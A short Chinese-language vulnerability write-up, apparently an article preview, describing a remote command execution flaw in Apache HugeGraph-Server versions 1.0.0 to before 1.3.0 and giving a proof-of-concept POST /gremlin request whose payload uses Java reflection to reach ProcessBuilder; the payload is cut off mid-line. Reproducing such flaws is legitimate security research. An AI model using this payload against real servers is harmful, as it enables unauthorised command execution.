文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 Apache HugeGraph是美国阿帕奇(Apache)基金会的一个速度快、可扩展性强的图形数据库。 Apache HugeGraph 1.0.0至1.3.0之前版本存在安全漏洞,该漏洞源于存在远程命令执行(RCE)漏洞。 0x02影响版本 1.0.0 < = HugeGraph-Server < 1.3.0 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 POC 漏洞复现 POST /gremlin HTTP/1.1 Host : 127.0.0.1 Content-Type : application/json Content-Length : 382 { "gremlin" : "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor
………………………………
